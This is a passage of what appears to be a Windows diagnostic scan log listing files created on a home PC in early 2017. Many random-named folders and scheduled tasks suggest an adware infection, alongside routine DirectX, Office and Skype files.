2017-03-06 20:28 - 2017-03-09 20:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-06 20:28 - 2017-03-09 20:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-03-06 20:28 - 2017-03-09 20:07 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\Mozilla
2017-03-06 20:28 - 2017-03-06 20:36 - 00000000 ____D C:\Users\Dominik\AppData\Local\Mozilla
2017-03-06 20:17 - 2017-03-09 21:15 - 00002263 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-03-06 20:17 - 2017-03-09 21:15 - 00002251 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-03-06 20:13 - 2017-03-06 20:13 - 00001996 _____ C:\Windows\System32\Tasks\MiovucyN0s
2017-03-06 20:07 - 2017-03-06 20:07 - 00000000 _____ C:\Windows\system32\__000000014217CFE5__C0000005.dmp
2017-03-06 20:05 - 2017-03-06 20:05 - 00000037 _____ C:\Windows\wininit.ini
2017-03-06 20:02 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\PE8WPINWZP
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\VDGBYFEBFY
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\MJJZVBDT3G
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\LRJ6346S7K
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\ADO2UTX8BS
2017-03-06 19:59 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\7OHOBHWLP9
2017-03-06 19:59 - 2017-03-06 20:00 - 00000000 ____D C:\Users\Dominik\AppData\Local\app
2017-03-06 19:59 - 2017-03-06 19:59 - 00000000 ____D C:\Users\Dominik\AppData\Local\WikiThemes
2017-03-06 19:58 - 2017-03-06 19:58 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Opera Software
2017-03-06 19:58 - 2017-03-06 19:58 - 00000000 ____D C:\Users\Dominik\AppData\Local\Opera Software
2017-03-06 19:57 - 2017-03-06 19:57 - 00002398 _____ C:\Windows\SysWOW64\findit.xml
2017-03-06 19:56 - 2017-03-12 00:49 - 00625272 _____ C:\Windows\system32\NetUtils2016.dll
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Electrum
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Voyasollam
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\PrefsSecure
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\PrefersSecure
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDWallPaper
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Logic Cramble
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\WS4B8H5XSR
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\JSO2JLBN37
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\DIN8PO21L4
2017-03-06 19:56 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\BMJWYKNX12
2017-03-06 19:56 - 2017-03-06 20:13 - 00000000 ____D C:\Users\Dominik\AppData\Local\YlPack
2017-03-06 19:56 - 2017-03-06 20:07 - 00000000 ____D C:\Windows\system32\SSL
2017-03-06 19:56 - 2017-03-06 20:05 - 00000000 ____D C:\Program Files (x86)\1dd9d7ce-c714-4189-b5bb-85c0f6065caf1488826604
2017-03-06 19:56 - 2017-03-06 19:59 - 00909944 _____ C:\Windows\system32\Drivers\NetUtils2016.sys
2017-03-06 19:56 - 2017-03-06 19:59 - 00003174 _____ C:\Windows\System32\Tasks\HDWallPaper
2017-03-06 19:56 - 2017-03-06 19:56 - 07288832 _____ C:\Users\Dominik\AppData\Roaming\agent.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 01891621 _____ C:\Users\Dominik\AppData\Roaming\Softdom.tst
2017-03-06 19:56 - 2017-03-06 19:56 - 00471968 _____ C:\Windows\system32\ns.block
2017-03-06 19:56 - 2017-03-06 19:56 - 00470592 _____ C:\Windows\SysWOW64\NetUtils2016.exe
2017-03-06 19:56 - 2017-03-06 19:56 - 00278509 _____ C:\Users\Dominik\AppData\Roaming\FAXMATCORE.del
2017-03-06 19:56 - 2017-03-06 19:56 - 00278509 _____ C:\Users\Dominik\AppData\Roaming\DALTRON.del
2017-03-06 19:56 - 2017-03-06 19:56 - 00140288 _____ C:\Users\Dominik\AppData\Roaming\Installer.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 00126464 _____ C:\Users\Dominik\AppData\Roaming\noah.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 00070752 _____ C:\Users\Dominik\AppData\Roaming\Config.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 00024300 _____ C:\Windows\System32\Tasks\{0A050547-0A0E-797E-0A11-087A0E0E117E}
2017-03-06 19:56 - 2017-03-06 19:56 - 00018432 _____ C:\Users\Dominik\AppData\Roaming\Main.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 00016272 _____ C:\Users\Dominik\AppData\Roaming\InstallationConfiguration.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 00005568 _____ C:\Users\Dominik\AppData\Roaming\md.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 00003054 _____ C:\Windows\System32\Tasks\hostTask
2017-03-06 19:56 - 2017-03-06 19:56 - 00001841 _____ C:\Users\Dominik\Desktop\MyMemory.lnk
2017-03-06 19:56 - 2017-03-06 19:56 - 00000728 __RSH C:\ProgramData\ntuser.pol
2017-03-06 19:56 - 2017-03-06 19:56 - 00000000 ____D C:\Windows\SysWOW64\sstmp
2017-03-06 19:56 - 2017-03-06 19:56 - 00000000 ____D C:\Windows\system32\sstmp
2017-03-06 19:55 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\CIA9KT8HZ1
2017-03-06 19:55 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files\BXDVXYNZA6
2017-03-06 19:54 - 2017-03-09 21:09 - 00000000 ____D C:\Users\Dominik\AppData\Local\Cumospthejise
2017-03-06 19:54 - 2017-03-09 21:09 - 00000000 ____D C:\Program Files (x86)\Ckerctyjolely Server
2017-03-06 19:54 - 2017-03-06 19:54 - 00006022 _____ C:\Windows\System32\Tasks\Ckerctyjolely Server
2017-03-06 19:54 - 2017-03-06 19:54 - 00005052 _____ C:\Windows\System32\Tasks\Reosyavasp
2017-03-06 19:54 - 2017-03-06 19:54 - 00003538 _____ C:\Windows\System32\Tasks\PPI Update
2017-03-06 19:47 - 2017-03-09 21:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016-Tools
2017-03-06 19:47 - 2017-03-06 19:47 - 00002506 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002502 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002481 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2017-03-06 19:47 - 2017-03-06 19:47 - 00002392 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2017-03-06 19:45 - 2017-03-06 19:45 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-03-05 21:21 - 2017-03-05 21:21 - 00002760 _____ C:\Windows\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2017-02-25 18:45 - 2017-02-25 19:06 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\MP3 Quality Modifier
2017-02-25 18:44 - 2017-03-11 14:34 - 00000000 ____D C:\Users\Dominik\AppData\Local\AvgSetupLog
2017-02-25 18:44 - 2017-03-11 14:34 - 00000000 ____D C:\ProgramData\Avg
2017-02-25 18:44 - 2017-03-11 14:34 - 00000000 ____D C:\Program Files (x86)\AVG
2017-02-25 18:44 - 2017-02-25 18:45 - 00000000 ____D C:\Users\Dominik\AppData\Local\Avg
2017-02-19 13:33 - 2017-02-19 13:43 - 00000000 ____D C:\Users\Dominik\AppData\Local\Fallout4
2017-02-18 15:35 - 2017-02-18 15:35 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\TowerUpStudios
2017-02-18 15:26 - 2017-02-18 15:26 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\Cybreath
2017-02-16 19:55 - 2017-02-16 19:55 - 00003218 _____ C:\Windows\System32\Tasks\{1476CE1F-B723-412A-B1E8-B7ABA1D628C5}
2017-02-13 20:10 - 2017-02-15 17:22 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Skype
2017-02-13 20:10 - 2017-02-13 20:10 - 00002699 _____ C:\Users\Public\Desktop\Skype.lnk
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\Tracing
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\AppData\Local\TeamSpeak 3
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\.TeamSpeak 3
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\Users\Dominik\.QtWebEngineProcess
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\ProgramData\Skype
2017-02-13 20:10 - 2017-02-13 20:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-02-13 19:37 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2017-02-13 19:37 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2017-02-13 19:37 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2017-02-13 19:37 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2017-02-13 19:37 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 05554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 02582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 02475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2017-02-13 19:37 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2017-02-13 19:37 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 05425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 02430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 00520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2017-02-13 19:37 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2017-02-13 19:37 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2017-02-13 19:37 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2017-02-13 19:37 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2017-02-13 19:37 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2017-02-13 19:37 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2017-02-13 19:37 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 04992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 01942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2017-02-13 19:37 - 2008-07-10 11:00 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2017-02-13 19:37 - 2008-05-30 14:19 - 00511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2017-02-13 19:37 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2017-02-13 19:37 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2017-02-13 19:37 - 2008-05-30 14:18 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2017-02-13 19:37 - 2008-05-30 14:17 - 00068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2017-02-13 19:37 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2017-02-13 19:37 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2017-02-13 19:37 - 2008-05-30 14:16 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 04991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 01941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2017-02-13 19:37 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2017-02-13 19:37 - 2008-03-05 16:04 - 00489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2017-02-13 19:37 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2017-02-13 19:37 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2017-02-13 19:37 - 2008-03-05 16:03 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2017-02-13 19:37 - 2008-03-05 16:00 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2017-02-13 19:37 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 04910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 01860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2017-02-13 19:37 - 2008-02-05 23:07 - 00529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2017-02-13 19:37 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2017-02-13 19:37 - 2007-10-22 03:40 - 00411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2017-02-13 19:37 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
2017-02-13 19:37 - 2007-10-22 03:37 - 00021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2017-02-13 19:37 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 05081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 02006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2017-02-13 19:37 - 2007-10-02 09:56 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2017-02-13 19:37 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2017-02-13 19:37 - 2007-07-20 00:57 - 00411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2017-02-13 19:37 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 05073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 01985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2017-02-13 19:37 - 2007-06-20 20:49 - 00409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2017-02-13 19:37 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 04496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 01401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2017-02-13 19:37 - 2007-04-04 18:55 - 00403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2017-02-13 19:37 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2017-02-13 19:37 - 2007-04-04 18:54 - 00107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2017-02-13 19:37 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2017-02-13 19:37 - 2007-03-15 16:57 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2017-02-13 19:37 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 04494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 01400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2017-02-13 19:37 - 2007-03-05 12:42 - 00017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2017-02-13 19:37 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2017-02-13 19:37 - 2007-01-24 15:27 - 00393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2017-02-13 19:37 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
